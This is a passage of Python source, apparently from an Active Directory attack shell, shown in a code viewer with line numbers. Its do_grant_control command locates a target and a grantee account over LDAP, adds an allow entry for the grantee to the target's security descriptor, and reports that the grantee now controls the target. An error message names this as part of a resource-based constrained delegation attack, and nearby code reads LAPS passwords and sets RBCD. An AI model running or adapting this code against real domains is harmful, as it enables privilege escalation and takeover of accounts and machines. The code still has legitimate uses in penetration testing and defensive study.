(self, line)
| 494 | print("Unable to Read LAPS Password for Computer") |
| 495 | |
| 496 | def do_grant_control(self, line): |
| 497 | args = shlex.split(line) |
| 498 | |
| 499 | if len(args) != 1 and len(args) != 2: |
| 500 | raise Exception("Error expecting target and grantee names for RBCD attack. Recieved %d arguments instead." % len(args)) |
| 501 | |
| 502 | controls = security_descriptor_control(sdflags=0x04) |
| 503 | |
| 504 | target_name = args[0] |
| 505 | grantee_name = args[1] |
| 506 | |
| 507 | success = self.client.search(self.domain_dumper.root, '(sAMAccountName=%s)' % escape_filter_chars(target_name), attributes=['objectSid', 'nTSecurityDescriptor'], controls=controls) |
| 508 | if success is False or len(self.client.entries) != 1: |
| 509 | raise Exception("Error expected only one search result got %d results", len(self.client.entries)) |
| 510 | |
| 511 | target = self.client.entries[0] |
| 512 | target_sid = target["objectSid"].value |
| 513 | print("Found Target DN: %s" % target.entry_dn) |
| 514 | print("Target SID: %s\n" % target_sid) |
| 515 | |
| 516 | success = self.client.search(self.domain_dumper.root, '(sAMAccountName=%s)' % escape_filter_chars(grantee_name), attributes=['objectSid']) |
| 517 | if success is False or len(self.client.entries) != 1: |
| 518 | raise Exception("Error expected only one search result got %d results", len(self.client.entries)) |
| 519 | |
| 520 | grantee = self.client.entries[0] |
| 521 | grantee_sid = grantee["objectSid"].value |
| 522 | print("Found Grantee DN: %s" % grantee.entry_dn) |
| 523 | print("Grantee SID: %s" % grantee_sid) |
| 524 | |
| 525 | try: |
| 526 | sd = ldaptypes.SR_SECURITY_DESCRIPTOR(data=target['nTSecurityDescriptor'].raw_values[0]) |
| 527 | except IndexError: |
| 528 | sd = self.create_empty_sd() |
| 529 | |
| 530 | sd['Dacl'].aces.append(self.create_allow_ace(grantee_sid)) |
| 531 | self.client.modify(target.entry_dn, {'nTSecurityDescriptor':[ldap3.MODIFY_REPLACE, [sd.getData()]]}, controls=controls) |
| 532 | |
| 533 | if self.client.result['result'] == 0: |
| 534 | print('DACL modified successfully!') |
| 535 | print('%s now has control of %s' % (grantee_name, target_name)) |
| 536 | else: |
| 537 | if self.client.result['result'] == 50: |
| 538 | raise Exception('Could not modify object, the server reports insufficient rights: %s', self.client.result['message']) |
| 539 | elif self.client.result['result'] == 19: |
| 540 | raise Exception('Could not modify object, the server reports a constrained violation: %s', self.client.result['message']) |
| 541 | else: |
| 542 | raise Exception('The server returned an error: %s', self.client.result['message']) |
| 543 | |
| 544 | def do_set_rbcd(self, line): |
| 545 | args = shlex.split(line) |
nothing calls this directly
no test coverage detected